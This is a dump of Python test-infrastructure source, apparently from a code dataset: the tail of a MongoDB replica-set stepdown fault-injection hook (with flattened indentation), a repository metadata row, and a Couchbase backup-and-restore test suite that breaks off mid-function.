shard_stepdown: whether to stepdown the shard replica sets in a sharded cluster.
stepdown_duration_secs: the number of seconds to step down the primary.
stepdown_interval_ms: the number of milliseconds between stepdowns.
terminate: shut down the node cleanly as a means of stepping it down.
kill: With a 50% probability, kill the node instead of shutting it down cleanly.
            use_stepdown_permitted_file: use a file to control whether the stepdown thread should perform a stepdown.
use_stepping_down_file: use a file to denote when stepdown is active.
wait_for_mongos_retarget: whether to run validate on all mongoses for each collection
in each database, after pausing the stepdown thread.
Note that the "terminate" and "kill" arguments are named after the "SIGTERM" and
"SIGKILL" signals that are used to stop the process. On Windows, there are no signals,
so we use a different means to achieve the same result as sending SIGTERM or SIGKILL.
"""
interface.Hook.__init__(self, hook_logger, fixture, ContinuousStepdown.DESCRIPTION)
self._fixture = fixture
self._config_stepdown = config_stepdown
self._shard_stepdown = shard_stepdown
self._stepdown_duration_secs = stepdown_duration_secs
self._stepdown_interval_secs = float(stepdown_interval_ms) / 1000
self._wait_for_mongos_retarget = wait_for_mongos_retarget
self._rs_fixtures = []
self._mongos_fixtures = []
self._stepdown_thread = None
# kill implies terminate.
self._terminate = terminate or kill
self._kill = kill
# The stepdown file names need to match the same construction as found in
# jstests/concurrency/fsm_libs/resmoke_runner.js.
dbpath_prefix = fixture.get_dbpath_prefix()
if use_stepdown_permitted_file:
self._stepdown_permitted_file = os.path.join(
dbpath_prefix, "concurrency_sharded_stepdown_stepdown_permitted")
else:
self._stepdown_permitted_file = None
if use_stepping_down_file:
self._stepping_down_file = os.path.join(dbpath_prefix,
"concurrency_sharded_stepdown_stepping_down")
else:
self._stepping_down_file = None
def before_suite(self, test_report):
"""Before suite."""
if not self._rs_fixtures:
self._add_fixture(self._fixture)
utils.remove_if_exists(self._stepdown_permitted_file)
utils.remove_if_exists(self._stepping_down_file)
self._stepdown_thread = _StepdownThread(
self.logger, self._mongos_fixtures, self._rs_fixtures, self._stepdown_interval_secs,
self._stepdown_duration_secs, self._terminate, self._kill,
self._stepdown_permitted_file, self._stepping_down_file, self._wait_for_mongos_retarget)
self.logger.info("Starting the stepdown thread.")
self._stepdown_thread.start()
def after_suite(self, test_report):
"""After suite."""
self.logger.info("Stopping the stepdown thread.")
self._stepdown_thread.stop()
self.logger.info("Stepdown thread stopped.")
def before_test(self, test, test_report):
"""Before test."""
self._check_thread()
self.logger.info("Resuming the stepdown thread.")
# Once the stepdown thread has started any files it creates must be deleted within the
# thread, since the Windows file handle is still open.
self._stepdown_thread.pause()
self._stepdown_thread.clean_stepdown_files()
self._stepdown_thread.resume()
def after_test(self, test, test_report):
"""After test."""
self._check_thread()
self.logger.info("Pausing the stepdown thread.")
self._stepdown_thread.pause()
self.logger.info("Paused the stepdown thread.")
def _check_thread(self):
if not self._stepdown_thread.is_alive():
msg = "The stepdown thread is not running."
self.logger.error(msg)
raise errors.ServerFailure(msg)
def _add_fixture(self, fixture):
if isinstance(fixture, replicaset.ReplicaSetFixture):
if not fixture.all_nodes_electable:
raise ValueError(
"The replica sets that are the target of the ContinuousStepdown hook must have"
" the 'all_nodes_electable' option set.")
self._rs_fixtures.append(fixture)
elif isinstance(fixture, shardedcluster.ShardedClusterFixture):
if self._shard_stepdown:
for shard_fixture in fixture.shards:
self._add_fixture(shard_fixture)
if self._config_stepdown:
self._add_fixture(fixture.configsvr)
if self._wait_for_mongos_retarget:
for mongos_fixture in fixture.mongos:
self._mongos_fixtures.append(mongos_fixture)
class _StepdownThread(threading.Thread): # pylint: disable=too-many-instance-attributes
def __init__( # pylint: disable=too-many-arguments
self, logger, mongos_fixtures, rs_fixtures, stepdown_interval_secs,
stepdown_duration_secs, terminate, kill, stepdown_permitted_file, stepping_down_file,
wait_for_mongos_retarget):
"""Initialize _StepdownThread."""
threading.Thread.__init__(self, name="StepdownThread")
self.daemon = True
self.logger = logger
self._mongos_fixtures = mongos_fixtures
self._rs_fixtures = rs_fixtures
self._stepdown_interval_secs = stepdown_interval_secs
self._stepdown_duration_secs = stepdown_duration_secs
self._terminate = terminate
self._kill = kill
self._stepdown_permitted_file = stepdown_permitted_file
self._stepping_down_file = stepping_down_file
self._should_wait_for_mongos_retarget = wait_for_mongos_retarget
self._last_exec = time.time()
# Event set when the thread has been stopped using the 'stop()' method.
self._is_stopped_evt = threading.Event()
# Event set when the thread is not paused.
self._is_resumed_evt = threading.Event()
self._is_resumed_evt.set()
# Event set when the thread is not performing stepdowns.
self._is_idle_evt = threading.Event()
self._is_idle_evt.set()
self._step_up_stats = collections.Counter()
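        # Counts successful replSetStepUp attempts, keyed by "<replset>/<node>".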
def run(self):
"""Execute the thread."""
if not self._rs_fixtures:
self.logger.warning("No replica set on which to run stepdowns.")
return
while True:
if self._is_stopped():
break
self._wait_for_permission_or_resume()
now = time.time()
if now - self._last_exec > self._stepdown_interval_secs:
self.logger.info("Starting stepdown of all primaries")
self._step_down_all()
# Wait until each replica set has a primary, so the test can make progress.
self._await_primaries()
self._last_exec = time.time()
self.logger.info("Completed stepdown of all primaries in %0d ms",
(self._last_exec - now) * 1000)
now = time.time()
if self._is_permitted():
# The 'wait_secs' is used to wait 'self._stepdown_interval_secs' from the moment
# the last stepdown command was sent.
wait_secs = max(0, self._stepdown_interval_secs - (now - self._last_exec))
self._wait(wait_secs)
def stop(self):
"""Stop the thread."""
self._is_stopped_evt.set()
# Unpause to allow the thread to finish.
self.resume()
self.join()
def _is_stopped(self):
return self._is_stopped_evt.is_set()
def pause(self):
"""Pause the thread."""
self._is_resumed_evt.clear()
# Wait until we are no longer executing stepdowns.
self._is_idle_evt.wait()
        # Wait until all the replica sets have primaries.
self._await_primaries()
# Wait for Mongos to retarget the primary for each shard and the config server.
self._do_wait_for_mongos_retarget()
def resume(self):
"""Resume the thread."""
self._is_resumed_evt.set()
self.logger.info(
"Current statistics about which nodes have been successfully stepped up: %s",
self._step_up_stats)
def _wait_for_permission_or_resume(self):
# Wait until stop, _stepdown_permitted_file or resume.
if self._stepdown_permitted_file:
while not os.path.isfile(self._stepdown_permitted_file) and not self._is_stopped():
# Set a short sleep during busy wait time for self._stepdown_permitted_file.
self._wait(0.1)
else:
self._is_resumed_evt.wait()
def _wait(self, timeout):
# Wait until stop or timeout.
self._is_stopped_evt.wait(timeout)
def _await_primaries(self):
for fixture in self._rs_fixtures:
fixture.get_primary()
def _step_down_all(self):
self._is_idle_evt.clear()
self._stepdown_starting()
try:
if self._is_permitted():
for rs_fixture in self._rs_fixtures:
self._step_down(rs_fixture)
finally:
self._stepdown_completed()
self._is_idle_evt.set()
def _step_down(self, rs_fixture):
try:
primary = rs_fixture.get_primary(timeout_secs=self._stepdown_interval_secs)
except errors.ServerFailure:
# We ignore the ServerFailure exception because it means a primary wasn't available.
# We'll try again after self._stepdown_interval_secs seconds.
return
secondaries = rs_fixture.get_secondaries()
# Check that the fixture is still running before stepping down or killing the primary.
# This ensures we still detect some cases in which the fixture has already crashed.
if not rs_fixture.is_running():
raise errors.ServerFailure("ReplicaSetFixture expected to be running in"
" ContinuousStepdown, but wasn't.")
if self._terminate:
should_kill = self._kill and random.choice([True, False])
action = "Killing" if should_kill else "Terminating"
self.logger.info("%s the primary on port %d of replica set '%s'.", action, primary.port,
rs_fixture.replset_name)
primary.mongod.stop(kill=should_kill)
primary.mongod.wait()
else:
self.logger.info("Stepping down the primary on port %d of replica set '%s'.",
primary.port, rs_fixture.replset_name)
try:
client = primary.mongo_client()
client.admin.command(
bson.SON([
("replSetStepDown", self._stepdown_duration_secs),
("force", True),
]))
except pymongo.errors.AutoReconnect:
# AutoReconnect exceptions are expected as connections are closed during stepdown.
pass
except pymongo.errors.PyMongoError:
self.logger.exception(
"Error while stepping down the primary on port %d of replica set '%s'.",
primary.port, rs_fixture.replset_name)
raise
        # We pick an arbitrary secondary to run for election immediately in order to avoid a long
# period where the replica set doesn't have write availability. If none of the secondaries
# are eligible, or their election attempt fails, then we'll simply not have write
# availability until the self._stepdown_duration_secs duration expires and 'primary' steps
# back up again.
while secondaries:
chosen = random.choice(secondaries)
self.logger.info("Attempting to step up the secondary on port %d of replica set '%s'.",
chosen.port, rs_fixture.replset_name)
try:
client = chosen.mongo_client()
client.admin.command("replSetStepUp")
break
except pymongo.errors.OperationFailure:
# OperationFailure exceptions are expected when the election attempt fails due to
# not receiving enough votes. This can happen when the 'chosen' secondary's opTime
# is behind that of other secondaries. We handle this by attempting to elect a
# different secondary.
self.logger.info("Failed to step up the secondary on port %d of replica set '%s'.",
chosen.port, rs_fixture.replset_name)
secondaries.remove(chosen)
if self._terminate:
self.logger.info("Attempting to restart the old primary on port %d of replica set '%s.",
primary.port, rs_fixture.replset_name)
# Restart the mongod on the old primary and wait until we can contact it again. Keep the
# original preserve_dbpath to restore after restarting the mongod.
original_preserve_dbpath = primary.preserve_dbpath
primary.preserve_dbpath = True
try:
primary.setup()
primary.await_ready()
finally:
primary.preserve_dbpath = original_preserve_dbpath
# Bump the counter for the chosen secondary to indicate that the replSetStepUp command
# executed successfully.
key = "{}/{}".format(rs_fixture.replset_name,
chosen.get_internal_connection_string() if secondaries else "none")
self._step_up_stats[key] += 1
def _do_wait_for_mongos_retarget(self): # pylint: disable=too-many-branches
"""Run collStats on each collection in each database on each mongos.
This is to ensure mongos can target the primary for each shard with data, including the
config servers.
"""
if not self._should_wait_for_mongos_retarget:
return
for mongos_fixture in self._mongos_fixtures:
mongos_conn_str = mongos_fixture.get_internal_connection_string()
try:
client = mongos_fixture.mongo_client()
except pymongo.errors.AutoReconnect:
pass
for db in client.database_names():
self.logger.info("Waiting for mongos %s to retarget db: %s", mongos_conn_str, db)
start_time = time.time()
while True:
try:
coll_names = client[db].collection_names()
break
except pymongo.errors.NotMasterError:
pass
retarget_time = time.time() - start_time
if retarget_time >= 60:
self.logger.exception(
"Timeout waiting for mongos: %s to retarget to db: %s", mongos_conn_str,
db)
raise # pylint: disable=misplaced-bare-raise
time.sleep(0.2)
for coll in coll_names:
while True:
try:
client[db].command({"collStats": coll})
break
except pymongo.errors.NotMasterError:
pass
retarget_time = time.time() - start_time
if retarget_time >= 60:
self.logger.exception(
"Timeout waiting for mongos: %s to retarget to db: %s",
mongos_conn_str, db)
raise # pylint: disable=misplaced-bare-raise
time.sleep(0.2)
retarget_time = time.time() - start_time
self.logger.info("Finished waiting for mongos: %s to retarget db: %s, in %d ms",
mongos_conn_str, db, retarget_time * 1000)
def _is_permitted(self):
"""Permit a stepdown if the permitted file is not specified or it exists.
The self._permitted_file is created by an external framework, i.e., JS tests.
"""
if self._stepdown_permitted_file:
return os.path.isfile(self._stepdown_permitted_file)
return self._is_resumed_evt.is_set()
def _stepdown_starting(self):
"""Create self._stepping_down_file, if specified."""
if self._stepping_down_file:
if os.path.isfile(self._stepping_down_file):
raise # pylint: disable=misplaced-bare-raise
with open(self._stepping_down_file, "w") as fh:
fh.write("")
def _stepdown_completed(self):
"""Delete self._stepping_down_file, if specified."""
utils.remove_if_exists(self._stepping_down_file)
def clean_stepdown_files(self):
"""Remove the stepdown files."""
utils.remove_if_exists(self._stepdown_permitted_file)
utils.remove_if_exists(self._stepping_down_file)
| 45.513189
| 103
| 0.625586
|
2f91cbec1a2fa6a9bac553bde282603a18a18082
| 28,865
|
py
|
Python
|
pytests/backup/ibr.py
|
sumedhpb/testrunner
|
9ff887231c75571624abc31a3fb5248110e01203
|
[
"Apache-2.0"
] | 14
|
2015-02-06T02:47:57.000Z
|
2020-03-14T15:06:05.000Z
|
pytests/backup/ibr.py
|
sumedhpb/testrunner
|
9ff887231c75571624abc31a3fb5248110e01203
|
[
"Apache-2.0"
] | 3
|
2019-02-27T19:29:11.000Z
|
2021-06-02T02:14:27.000Z
|
pytests/backup/ibr.py
|
sumedhpb/testrunner
|
9ff887231c75571624abc31a3fb5248110e01203
|
[
"Apache-2.0"
] | 108
|
2015-03-26T08:58:49.000Z
|
2022-03-21T05:21:39.000Z
|
__author__ = 'ashvinder'
import re
import os
import gc
import logger
import time
from TestInput import TestInputSingleton
from backup.backup_base import BackupBaseTest
from remote.remote_util import RemoteMachineShellConnection
from couchbase_helper.documentgenerator import BlobGenerator
from couchbase_helper.documentgenerator import DocumentGenerator
from memcached.helper.kvstore import KVStore
from membase.api.rest_client import RestConnection, Bucket
from couchbase_helper.data_analysis_helper import *
from memcached.helper.data_helper import VBucketAwareMemcached
from view.spatialquerytests import SimpleDataSet
from view.spatialquerytests import SpatialQueryTests
from membase.helper.spatial_helper import SpatialHelper
from couchbase_helper.cluster import Cluster
from membase.helper.bucket_helper import BucketOperationHelper
from couchbase_helper.document import DesignDocument, View
import copy
class IBRTests(BackupBaseTest):
def setUp(self):
super(IBRTests, self).setUp()
self.num_mutate_items = self.input.param("mutate_items", 1000)
gen_load = BlobGenerator('testdata', 'testdata-', self.value_size, end=self.num_items)
self._load_all_buckets(self.master, gen_load, "create", 0, 1, self.item_flag, True, batch_size=20000,
pause_secs=5, timeout_secs=180)
self._wait_for_stats_all_buckets(self.servers[:self.num_servers])
#Take a full backup
if not self.command_options:
self.command_options = []
options = self.command_options + [' -m full']
self.total_backups = 1
self.shell.execute_cluster_backup(self.couchbase_login_info, self.backup_location, options)
def tearDown(self):
super(IBRTests, self).tearDown()
def restoreAndVerify(self, bucket_names, kvs_before, expected_error=None):
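        # Restore the backup into the freshly re-created buckets and verify the data;
        # when expected_error is given, assert that the restore output contains it.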
for bucket in self.buckets:
bucket.kvs[1] = kvs_before[bucket.name]
del kvs_before
gc.collect()
errors, outputs = self.shell.restore_backupFile(self.couchbase_login_info, self.backup_location, bucket_names)
errors.extend(outputs)
error_found = False
if expected_error:
for line in errors:
if line.find(expected_error) != -1:
error_found = True
break
self.assertTrue(error_found, "Expected error not found: %s" % expected_error)
self._wait_for_stats_all_buckets(self.servers[:self.num_servers])
if expected_error:
for bucket in self.buckets:
bucket.kvs[1] = KVStore()
self.verify_results(self.master)
self._verify_stats_all_buckets(self.servers[:self.num_servers])
def verify_dir_structure(self, total_backups, buckets, nodes):
cmd = 'find ' + self.backup_location + ' -type f'
if self.shell.info.type.lower() == 'windows':
cmd = 'cmd.exe /C "dir /s /b C:\\tmp\\backup"'
output, error = self.shell.execute_command(cmd)
self.log.info("output = {0} error = {1}".format(output, error))
if error:
            raise Exception('Got error {0}'.format(error))
expected_design_json = total_backups * buckets
expected_data_cbb = total_backups * buckets * nodes
expected_meta_json = total_backups * buckets * nodes
expected_failover_json = total_backups * buckets * nodes
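        # Every backup session writes one design.json per bucket, plus one
        # data-0000.cbb, failover.json and meta.json per bucket per node.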
        timestamp = r'\d{4}\-\d{2}\-\d{2}T\d+Z'
        pattern_mode = '(full|accu|diff)'
        timestamp_backup = timestamp + r'\-' + pattern_mode
        pattern_bucket = r'bucket-\w+'
        pattern_node = r'node\-\d{1,3}\.\d{1,3}\.\d{1,3}.\d{1,3}.+'
pattern_design_json = timestamp + '/|\\\\' + timestamp_backup + \
'/|\\\\' + pattern_bucket
pattern_backup_files = pattern_design_json + '/|\\\\' + pattern_node
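        # Paths are expected to look like:
        #   <timestamp>/<timestamp>-<full|accu|diff>/bucket-<name>/node-<ip>/<backup file>
        # (the '/|\\' alternation accepts both Unix and Windows separators).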
data_cbb = 0
failover = 0
meta_json = 0
design_json = 0
for line in output:
if 'data-0000.cbb' in line:
if re.search(pattern_backup_files, line):
data_cbb += 1
if 'failover.json' in line:
if re.search(pattern_backup_files, line):
failover += 1
if self.cb_version[:5] != "4.5.1" and 'meta.json' in line:
if re.search(pattern_backup_files, line):
meta_json += 1
if 'design.json' in line:
if re.search(pattern_design_json, line):
design_json += 1
self.log.info("expected_data_cbb {0} data_cbb {1}"
.format(expected_data_cbb, data_cbb))
self.log.info("expected_failover_json {0} failover {1}"
.format(expected_failover_json, failover))
if self.cb_version[:5] != "4.5.1":
self.log.info("expected_meta_json {0} meta_json {1}"
.format(expected_meta_json, meta_json))
""" add json support later in this test
self.log.info("expected_design_json {0} design_json {1}"
.format(expected_design_json, design_json)) """
if self.cb_version[:5] != "4.5.1":
if data_cbb == expected_data_cbb and failover == expected_failover_json and \
meta_json == expected_meta_json:
# add support later in and design_json == expected_design_json:
return True
else:
if data_cbb == expected_data_cbb and failover == expected_failover_json:
return True
return False
def testFullBackupDirStructure(self):
if not self.verify_dir_structure(self.total_backups, len(self.buckets), len(self.servers)):
raise Exception('Backup Directory Verification Failed for Full Backup')
def testMultipleFullBackupDirStructure(self):
for count in range(10):
# Update data
gen_update = BlobGenerator('testdata', 'testdata-', self.value_size, end=self.num_items)
self._load_all_buckets(self.master, gen_update, "update", 0, 1, self.item_flag, True, batch_size=20000,
pause_secs=5, timeout_secs=180)
self._wait_for_stats_all_buckets(self.servers[:self.num_servers])
#Take a incremental backup
options = self.command_options + [' -m full']
self.shell.execute_cluster_backup(self.couchbase_login_info, self.backup_location, options)
self.total_backups += 1
self.sleep(120)
if not self.verify_dir_structure(self.total_backups, len(self.buckets), len(self.servers)):
raise Exception('Backup Directory Verification Failed for Full Backup')
def testIncrBackupDirStructure(self):
# Update data
gen_update = BlobGenerator('testdata', 'testdata-', self.value_size, end=self.num_items)
self._load_all_buckets(self.master, gen_update, "update", 0, 1, self.item_flag, True, batch_size=20000,
pause_secs=5, timeout_secs=180)
self._wait_for_stats_all_buckets(self.servers[:self.num_servers])
#Take a incremental backup
options = self.command_options + [' -m accu']
self.shell.execute_cluster_backup(self.couchbase_login_info, self.backup_location, options)
self.total_backups += 1
if not self.verify_dir_structure(self.total_backups, len(self.buckets), len(self.servers)):
raise Exception('Backup Directory Verification Failed for Incremental Backup')
def testMultipleIncrBackupDirStructure(self):
for count in range(10):
# Update data
gen_update = BlobGenerator('testdata', 'testdata-', self.value_size, end=self.num_items)
self._load_all_buckets(self.master, gen_update, "update", 0, 1, self.item_flag, True, batch_size=20000,
pause_secs=5, timeout_secs=180)
self._wait_for_stats_all_buckets(self.servers[:self.num_servers])
#Take a incremental backup
options = self.command_options + [' -m accu']
self.shell.execute_cluster_backup(self.couchbase_login_info, self.backup_location, options)
self.total_backups += 1
self.log.info("sleeping for 30 secs")
self.sleep(30)
if not self.verify_dir_structure(self.total_backups, len(self.buckets), len(self.servers)):
raise Exception('Backup Directory Verification Failed for Incremental Backup')
def testMultipleDiffBackupDirStructure(self):
for count in range(10):
# Update data
gen_update = BlobGenerator('testdata', 'testdata-', self.value_size, end=self.num_items)
self._load_all_buckets(self.master, gen_update, "update", 0, 1, self.item_flag, True, batch_size=20000,
pause_secs=5, timeout_secs=180)
self._wait_for_stats_all_buckets(self.servers[:self.num_servers])
#Take a incremental backup
options = self.command_options + [' -m diff']
self.shell.execute_cluster_backup(self.couchbase_login_info, self.backup_location, options)
self.total_backups += 1
self.sleep(60)
if not self.verify_dir_structure(self.total_backups, len(self.buckets), len(self.servers)):
raise Exception('Backup Directory Verification Failed for Differential Backup')
def testMultipleIncrDiffBackupDirStructure(self):
for count in range(10):
# Update data
gen_update = BlobGenerator('testdata', 'testdata-', self.value_size, end=self.num_items)
self._load_all_buckets(self.master, gen_update, "update", 0, 1, self.item_flag, True, batch_size=20000,
pause_secs=5, timeout_secs=180)
self._wait_for_stats_all_buckets(self.servers[:self.num_servers])
#Take a incremental backup
options = self.command_options + [' -m accu']
self.shell.execute_cluster_backup(self.couchbase_login_info, self.backup_location, options)
self.total_backups += 1
self.sleep(60)
# Update data
gen_update = BlobGenerator('testdata', 'testdata-', self.value_size, end=self.num_items)
self._load_all_buckets(self.master, gen_update, "update", 0, 1, self.item_flag, True, batch_size=20000,
pause_secs=5, timeout_secs=180)
self._wait_for_stats_all_buckets(self.servers[:self.num_servers])
#Take a diff backup
options = self.command_options + [' -m diff']
self.shell.execute_cluster_backup(self.couchbase_login_info, self.backup_location, options)
self.total_backups += 1
self.sleep(60)
if not self.verify_dir_structure(self.total_backups, len(self.buckets), len(self.servers)):
raise Exception('Backup Directory Verification Failed for Combo Incr and Diff Backup')
def testMultipleFullIncrDiffBackupDirStructure(self):
for count in range(10):
# Update data
gen_update = BlobGenerator('testdata', 'testdata-', self.value_size, end=self.num_items)
self._load_all_buckets(self.master, gen_update, "update", 0, 1, self.item_flag, True, batch_size=20000,
pause_secs=5, timeout_secs=180)
self._wait_for_stats_all_buckets(self.servers[:self.num_servers])
#Take a incremental backup
options = self.command_options + [' -m accu']
self.shell.execute_cluster_backup(self.couchbase_login_info, self.backup_location, options)
self.total_backups += 1
self.sleep(60)
# Update data
gen_update = BlobGenerator('testdata', 'testdata-', self.value_size, end=self.num_items)
self._load_all_buckets(self.master, gen_update, "update", 0, 1, self.item_flag, True, batch_size=20000,
pause_secs=5, timeout_secs=180)
self._wait_for_stats_all_buckets(self.servers[:self.num_servers])
#Take a diff backup
options = self.command_options + [' -m diff']
self.shell.execute_cluster_backup(self.couchbase_login_info, self.backup_location, options)
self.total_backups += 1
self.sleep(60)
# Update data
gen_update = BlobGenerator('testdata', 'testdata-', self.value_size, end=self.num_items)
self._load_all_buckets(self.master, gen_update, "update", 0, 1, self.item_flag, True, batch_size=20000,
pause_secs=5, timeout_secs=180)
self._wait_for_stats_all_buckets(self.servers[:self.num_servers])
#Take a full backup
options = self.command_options + [' -m full']
self.shell.execute_cluster_backup(self.couchbase_login_info, self.backup_location, options, delete_backup=False)
self.total_backups += 1
self.sleep(60)
if not self.verify_dir_structure(self.total_backups, len(self.buckets), len(self.servers)):
raise Exception('Backup Directory Verification Failed for Combo Full,Incr and Diff Backups')
def testDiffBackupDirStructure(self):
# Update data
gen_update = BlobGenerator('testdata', 'testdata-', self.value_size, end=5)
self._load_all_buckets(self.master, gen_update, "update", 0, 1, self.item_flag, True, batch_size=20000,
pause_secs=5, timeout_secs=180)
self._wait_for_stats_all_buckets(self.servers[:self.num_servers])
#Take a diff backup
options = self.command_options + [' -m diff']
self.shell.execute_cluster_backup(self.couchbase_login_info, self.backup_location, options)
self.total_backups += 1
if not self.verify_dir_structure(self.total_backups, len(self.buckets), len(self.servers)):
raise Exception('Backup Directory Verification Failed for Differential Backup')
def testIncrementalBackup(self):
gen_extra = BlobGenerator('zoom', 'zoom-', self.value_size, end=self.num_items)
self.log.info("Starting Incremental backup")
extra_items_deleted_flag = 0
if(self.doc_ops is not None):
self._load_all_buckets(self.master, gen_extra, "create", 0, 1, self.item_flag, True, batch_size=20000, pause_secs=5, timeout_secs=180)
if("update" in self.doc_ops):
self._load_all_buckets(self.master, gen_extra, "update", 0, 1, self.item_flag, True, batch_size=20000, pause_secs=5, timeout_secs=180)
if("delete" in self.doc_ops):
self._load_all_buckets(self.master, gen_extra, "delete", 0, 1, self.item_flag, True, batch_size=20000, pause_secs=5, timeout_secs=180)
extra_items_deleted_flag = 1
if("expire" in self.doc_ops):
if extra_items_deleted_flag == 1:
self._load_all_buckets(self.master, gen_extra, "create", 0, 1, self.item_flag, True, batch_size=20000, pause_secs=5, timeout_secs=180)
self._load_all_buckets(self.master, gen_extra, "update", self.expire_time, 1, self.item_flag, True, batch_size=20000, pause_secs=5, timeout_secs=180)
#Take a incremental backup
options = self.command_options + [' -m accu']
self.shell.execute_cluster_backup(self.couchbase_login_info, self.backup_location, options)
# Save copy of data
kvs_before = {}
for bucket in self.buckets:
kvs_before[bucket.name] = bucket.kvs[1]
bucket_names = [bucket.name for bucket in self.buckets]
# Delete all buckets
self._all_buckets_delete(self.master)
gc.collect()
self._bucket_creation()
self.sleep(20)
self.restoreAndVerify(bucket_names, kvs_before)
def testDifferentialBackup(self):
gen_extra = BlobGenerator('zoom', 'zoom-', self.value_size, end=self.num_items)
self.log.info("Starting Differential backup")
extra_items_deleted_flag = 0
if(self.doc_ops is not None):
self._load_all_buckets(self.master, gen_extra, "create", 0, 1, self.item_flag, True, batch_size=20000, pause_secs=5, timeout_secs=180)
if("update" in self.doc_ops):
self._load_all_buckets(self.master, gen_extra, "update", 0, 1, self.item_flag, True, batch_size=20000, pause_secs=5, timeout_secs=180)
if("delete" in self.doc_ops):
self._load_all_buckets(self.master, gen_extra, "delete", 0, 1, self.item_flag, True, batch_size=20000, pause_secs=5, timeout_secs=180)
extra_items_deleted_flag = 1
if("expire" in self.doc_ops):
if extra_items_deleted_flag == 1:
self._load_all_buckets(self.master, gen_extra, "create", 0, 1, self.item_flag, True, batch_size=20000, pause_secs=5, timeout_secs=180)
self._load_all_buckets(self.master, gen_extra, "update", self.expire_time, 1, self.item_flag, True, batch_size=20000, pause_secs=5, timeout_secs=180)
self._wait_for_stats_all_buckets(self.servers[:self.num_servers])
#Take a diff backup
options = self.command_options + [' -m diff']
self.shell.execute_cluster_backup(self.couchbase_login_info, self.backup_location, options)
# Save copy of data
kvs_before = {}
for bucket in self.buckets:
kvs_before[bucket.name] = bucket.kvs[1]
bucket_names = [bucket.name for bucket in self.buckets]
# Delete all buckets
self._all_buckets_delete(self.master)
gc.collect()
self._bucket_creation()
self.sleep(20)
self.restoreAndVerify(bucket_names, kvs_before)
def testFullBackup(self):
# Save copy of data
kvs_before = {}
for bucket in self.buckets:
kvs_before[bucket.name] = bucket.kvs[1]
bucket_names = [bucket.name for bucket in self.buckets]
# Delete all buckets
self._all_buckets_delete(self.master)
gc.collect()
self._bucket_creation()
self.sleep(20)
self.restoreAndVerify(bucket_names, kvs_before)
def testIncrementalBackupConflict(self):
gen_extra = BlobGenerator('zoom', 'zoom-', self.value_size, end=self.num_items)
self.log.info("Starting Incremental backup")
extra_items_deleted_flag = 0
if(self.doc_ops is not None):
self._load_all_buckets(self.master, gen_extra, "create", 0, 1, self.item_flag, True, batch_size=20000, pause_secs=5, timeout_secs=180)
if("update" in self.doc_ops):
self._load_all_buckets(self.master, gen_extra, "update", 0, 1, self.item_flag, True, batch_size=20000, pause_secs=5, timeout_secs=180)
if("delete" in self.doc_ops):
self._load_all_buckets(self.master, gen_extra, "delete", 0, 1, self.item_flag, True, batch_size=20000, pause_secs=5, timeout_secs=180)
extra_items_deleted_flag = 1
if("expire" in self.doc_ops):
if extra_items_deleted_flag == 1:
self._load_all_buckets(self.master, gen_extra, "create", 0, 1, self.item_flag, True, batch_size=20000, pause_secs=5, timeout_secs=180)
self._load_all_buckets(self.master, gen_extra, "update", self.expire_time, 1, self.item_flag, True, batch_size=20000, pause_secs=5, timeout_secs=180)
#Take a incremental backup
options = self.command_options + [' -m accu']
self.shell.execute_cluster_backup(self.couchbase_login_info, self.backup_location, options)
# Save copy of data
kvs_before = {}
for bucket in self.buckets:
kvs_before[bucket.name] = bucket.kvs[1]
bucket_names = [bucket.name for bucket in self.buckets]
# Delete all buckets
self._all_buckets_delete(self.master)
gc.collect()
        self.lww = self.input.param("lww_new", False)
self._bucket_creation()
self.sleep(20)
expected_error = self.input.param("expected_error", None)
self.restoreAndVerify(bucket_names, kvs_before, expected_error)
class IBRJsonTests(BackupBaseTest):
def setUp(self):
super(IBRJsonTests, self).setUp()
self.num_mutate_items = self.input.param("mutate_items", 1000)
template = '{{ "mutated" : 0, "age": {0}, "first_name": "{1}" }}'
gen_load = DocumentGenerator('load_by_id_test', template, list(range(5)),\
['james', 'john'], start=0, end=self.num_items)
self._load_all_buckets(self.master, gen_load, "create", 0, 1,\
self.item_flag, True, batch_size=20000,\
pause_secs=5, timeout_secs=180)
self._wait_for_stats_all_buckets(self.servers[:self.num_servers])
if self.test_with_view:
view_list = []
bucket = "default"
if self.dev_view:
prefix_ddoc="dev_ddoc"
else:
prefix_ddoc="ddoc"
ddoc_view_map = self.bucket_ddoc_map.pop(bucket, {})
for ddoc_count in range(self.num_ddocs):
design_doc_name = prefix_ddoc + str(ddoc_count)
view_list = self.make_default_views("views", self.num_views_per_ddoc)
self.create_views(self.master, design_doc_name, view_list,\
bucket, self.wait_timeout * 2)
ddoc_view_map[design_doc_name] = view_list
self.bucket_ddoc_map[bucket] = ddoc_view_map
#Take a full backup
if not self.command_options:
self.command_options = []
options = self.command_options + [' -m full']
self.total_backups = 1
self.shell.execute_cluster_backup(self.couchbase_login_info,\
self.backup_location, options)
self.sleep(2)
def testFullBackup(self):
# Save copy of data
kvs_before = {}
for bucket in self.buckets:
kvs_before[bucket.name] = bucket.kvs[1]
bucket_names = [bucket.name for bucket in self.buckets]
# Delete all buckets
self._all_buckets_delete(self.master)
gc.collect()
self._bucket_creation()
self.sleep(20)
self.restoreAndVerify(bucket_names, kvs_before)
def restoreAndVerify(self, bucket_names, kvs_before):
for bucket in self.buckets:
bucket.kvs[1] = kvs_before[bucket.name]
del kvs_before
gc.collect()
self.shell.restore_backupFile(self.couchbase_login_info,\
self.backup_location, bucket_names)
self.sleep(10)
self._wait_for_stats_all_buckets(self.servers[:self.num_servers])
self.verify_results(self.master)
self._verify_stats_all_buckets(self.servers[:self.num_servers])
""" add design doc and view """
if self.test_with_view:
result = False
query = {"stale" : "false", "full_set" : "true", \
"connection_timeout" : 60000}
for bucket, ddoc_view_map in list(self.bucket_ddoc_map.items()):
for ddoc_name, view_list in list(ddoc_view_map.items()):
for view in view_list:
try:
result = self.cluster.query_view(self.master,\
ddoc_name, view.name, query,\
self.num_items, timeout=10)
except Exception:
pass
if not result:
self.fail("There is no: View: {0} in Design Doc:"\
" {1} in bucket: {2}"\
.format(view.name, ddoc_name, bucket))
self.log.info("DDoc Data Validation Successful")
def tearDown(self):
super(IBRJsonTests, self).tearDown()
def testMultipleBackups(self):
if not self.command_options:
self.command_options = []
options = self.command_options
if self.backup_type is not None:
if "accu" in self.backup_type:
options = self.command_options + [' -m accu']
if "diff" in self.backup_type:
options = self.command_options + [' -m diff']
diff_backup = [" -m diff"]
accu_backup = [" -m accu"]
current_backup = [" -m diff"]
for count in range(self.number_of_backups):
if "mix" in self.backup_type:
if current_backup == diff_backup:
current_backup = accu_backup
options = self.command_options + accu_backup
elif current_backup == accu_backup:
current_backup = diff_backup
options = self.command_options + diff_backup
# Update data
